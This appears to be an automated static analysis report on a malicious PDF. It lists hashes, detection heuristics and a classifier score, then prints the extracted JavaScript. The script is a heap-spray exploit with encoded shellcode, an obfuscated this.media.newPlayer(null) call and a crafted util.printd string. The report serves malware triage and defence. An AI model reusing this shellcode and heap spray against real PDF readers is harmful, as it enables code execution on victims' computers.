Malicious PDF — malware analysis report

Static analysis result for SHA-256 59d5935299c7d105…

MALICIOUS

PDF

8.4 KB Created: 2009-12-17 16:59:10 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-10
MD5: 6870e40aa5baa6bcec88825d223b46aa SHA-1: 0985d8564191f31993e181a7f0b677a84e7224ca SHA-256: 59d5935299c7d105f8073db9461549a1408293be06265d2201ab7ea36aa9cf04
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as evidenced by the PDF_UNESCAPE firing and the presence of 'unescape()' calls. The extracted artifact 'javascript_obj0021_000.js' suggests the script is designed to execute malicious code. The exact intent of the script is unclear due to obfuscation, but it is likely to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var asdsadas=unescape("%"+aadd1+"%"+aadd2+"%"+aadd3+"%"+aadd4+"%"+aadd5+"%"+aadd6+"%"+aadd7+"%"+aadd8+"%"+aadd9+"%"+aadd10+"%"+aadd11+"%"+aadd12+"%"+aadd13+"%"+aadd14+"%"+aadd15+"%"+aadd16+"%"+aadd17+"%"+aadd18+"%"+aadd19+"%"+aadd20+"%"+aadd21+"%"+aadd22+"%"+aadd23+"%"+aadd24+"%"+aadd25+"%"+aadd26+"%"+aadd27+"%"+aadd28+"%"+aadd29+"%"+aadd30+"%"+aadd31+"%"+aadd32+"%"+aadd33+"%"+aadd34+"%"+aadd35+"%"+aadd36+"%"+aadd37+"%"+aadd38+"%"+aadd39+"%"+aadd40+"%"+aadd41+"%"+aadd42+"%"+aadd43+"%"+aadd44+"%" …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0021_000.js pdf-javascript-stream PDF /JS object 21 at offset 0x1883 5034 bytes
SHA-256: c4bb5e96dedf364f20c7b0a0e8fcd6d3fb7a5a2794fc2bc529f298b1c4cd234b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var aadd1 = "ucada";
var aadd2 = "ub6bd";
var aadd3 = "uaaad";
var aadd4 = "ud94a";
var aadd5 = "u2474";
var aadd6 = "u29f4";
var aadd7 = "ub1c9";
var aadd8 = "u5e33";
var aadd9 = "uee83";
var aadd10 = "u31fc";
var aadd11 = "u136e";
var aadd12 = "ud803";
var aadd13 = "u48be";
var aadd14 = "ud8bf";
var aadd15 = "u0529";
var aadd16 = "u2040";
var aadd17 = "u76aa";
var aadd18 = "uc5c8";
var aadd19 = "ua49b";
var aadd20 = "u8eae";
var aadd21 = "u788e";
var aadd22 = "uc2a4";
var aadd23 = "uf222";
var aadd24 = "uf6e8";
var aadd25 = "u76b1";
var aadd26 = "uf925";
var aadd27 = "u3c72";
var aadd28 = "u3413";
var aadd29 = "uf082";
var aadd30 = "u9a9b";
var aadd31 = "u9240";
var aadd32 = "ue067";
var aadd33 = "u7494";
var aadd34 = "u2b59";
var aadd35 = "u75e9";
var aadd36 = "u519e";
var aadd37 = "u2702";
var aadd38 = "u1e77";
var aadd39 = "ud8b1";
var aadd40 = "u62fc";
var aadd41 = "ud80a";
var aadd42 = "ue9d2";
var aadd43 = "ua232";
var aadd44 = "u2d57";
var aadd45 = "u18c6";
var aadd46 = "u7d59";
var aadd47 = "u1677";
var aadd48 = "u6511";
var aadd49 = "u70f3";
var aadd50 = "u9482";
var aadd51 = "u62d0";
var aadd52 = "udffe";
var aadd53 = "u505d";
var aadd54 = "ude74";
var aadd55 = "ua8b7";
var aadd56 = "ud175";
var aadd57 = "u67f7";
var aadd58 = "ude48";
var aadd59 = "u76f5";
var aadd60 = "ud88c";
var aadd61 = "u0ce5";
var aadd62 = "u1be6";
var aadd63 = "u169b";
var aadd64 = "u663d";
var aadd65 = "u9247";
var aadd66 = "uc0a0";
var aadd67 = "u040c";
var aadd68 = "uf101";
var aadd69 = "ud3c1";
var aadd70 = "ufdc2";
var aadd71 = "u90ae";
var aadd72 = "ue18d";
var aadd73 = "u7431";
var aadd74 = "u1da6";
var aadd75 = "u7bb9";
var aadd76 = "u9469";
var aadd77 = "u5ff9";
var aadd78 = "ufdad";
var aadd79 = "uc15a";
var aadd80 = "u5bf4";
var aadd81 = "ufe0c";
var aadd82 = "u03e7";
var aadd83 = "u5af1";
var aadd84 = "ua163";
var aadd85 = "udde6";
var aadd86 = "uaf2e";
var aadd87 = "u6cf9";
var aadd88 = "u9655";
var aadd89 = "u6efa";
var aadd90 = "ub856";
var aadd91 = "u5f92";
var aadd92 = "u57dd";
var aadd93 = "u5fe4";
var aadd94 = "u1c34";
var aadd95 = "u2a1a";
var aadd96 = "u3415";
var aadd97 = "uf3b3";
var aadd98 = "u05cf";
var aadd99 = "u03de";
var aadd100 = "u493a";
var aadd101 = "u87e7";
var aadd102 = "u31cf";
var aadd103 = "u971c";
var aadd104 = "u34a5";
var aadd105 = "u1f58";
var aadd106 = "u4455";
var aadd107 = "ucaf1";
var aadd108 = "ufb59";
var aadd109 = "udef2";
var aadd110 = "u9a39";
var aadd111 = "u8260";
var aadd112 = "u3993";
var aadd113 = "u2101";
var aadd114 = "u41ec";
var aadd115 = "u0000";
var aadd116 = "u0000";
var aadd117 = "u0000";
var aadd118 = "u0000";
var aadd119 = "u0000";
var aadd120 = "u0000";
var aadd121 = "u0000";
var aadd122 = "u0000";
var aadd123 = "u0000";
var aadd124 = "u0000";
var aadd125 = "u0000";
var aadd126 = "u0000";
var aadd127 = "u0000";
var aadd128 = "u0000";
var asdsadas=unescape("%"+aadd1+"%"+aadd2+"%"+aadd3+"%"+aadd4+"%"+aadd5+"%"+aadd6+"%"+aadd7+"%"+aadd8+"%"+aadd9+"%"+aadd10+"%"+aadd11+"%"+aadd12+"%"+aadd13+"%"+aadd14+"%"+aadd15+"%"+aadd16+"%"+aadd17+"%"+aadd18+"%"+aadd19+"%"+aadd20+"%"+aadd21+"%"+aadd22+"%"+aadd23+"%"+aadd24+"%"+aadd25+"%"+aadd26+"%"+aadd27+"%"+aadd28+"%"+aadd29+"%"+aadd30+"%"+aadd31+"%"+aadd32+"%"+aadd33+"%"+aadd34+"%"+aadd35+"%"+aadd36+"%"+aadd37+"%"+aadd38+"%"+aadd39+"%"+aadd40+"%"+aadd41+"%"+aadd42+"%"+aadd43+"%"+aadd44+"%"+aadd45+"%"+aadd46+"%"+aadd47+"%"+aadd48+"%"+aadd49+"%"+aadd50+"%"+aadd51+"%"+aadd52+"%"+aadd53+"%"+aadd54+"%"+aadd55+"%"+aadd56+"%"+aadd57+"%"+aadd58+"%"+aadd59+"%"+aadd60+"%"+aadd61+"%"+aadd62+"%"+aadd63+"%"+aadd64+"%"+aadd65+"%"+aadd66+"%"+aadd67+"%"+aadd68+"%"+aadd69+"%"+aadd70+"%"+aadd71+"%"+aadd72+"%"+aadd73+"%"+aadd74+"%"+aadd75+"%"+aadd76+"%"+aadd77+"%"+aadd78+"%"+aadd79+"%"+aadd80+"%"+aadd81+"%"+aadd82+"%"+aadd83+"%"+aadd84+"%"+aadd85+"%"+aadd86+"%"+aadd87+"%"+aadd88+"%"+aadd89+"%"+aadd90+"%"+aadd91+"%"+aadd92+"%"+aadd93+"%"+aadd94+"%"+aadd95+"%"+aadd96+"%"+aadd97+"%"+aadd98+"%"+aadd99+"%"+aadd100+"%"+aadd101+"%"+aadd102+"%"+aadd103+"%"+aadd104+"%"+aadd105+"%"+aadd106+"%"+aadd107+"%"+aadd108+"%"+aadd109+"%"+aadd110+"%"+aadd111+"%"+aadd112+"%"+aadd113+"%"+aadd114+"%"+aadd115+"%"+aadd116+"%"+aadd117+"%"+aadd118+"%"+aadd119+"%"+aadd120+"%"+aadd121+"%"+aadd122+"%"+aadd123+"%"+aadd124+"%"+aadd125+"%"+aadd126+"%"+aadd127+"%"+aadd128);

var n = unescape("%u3f42%u3792"); 
var xxx = 0x8000;
var sasf = "p";
var asf = "@";
var gsdgsd = "000000000000000";
while(n.length <= xxx) n += n;
n = n.substring(0, 0x8000 - asdsadas.length); 

var memory = new Array();

for(i = 0; i < 0x2000; i++)  memory[i] = n + asdsadas;
function retunU(input){	return "try{"+input+"}catch(e){}";}
function addQuotes(input){	return "this.media.ne"+input+"yer(null);";}
function ex_Needed_Func(assdsaf){evdal(assdsaf);}
var FromCak ='wPla';

	
ex_Needed_Func(retunU(addQuotes(FromCak)));



util.printd(sasf+asf+gsdgsd+"000000000 : pppp000", new Date());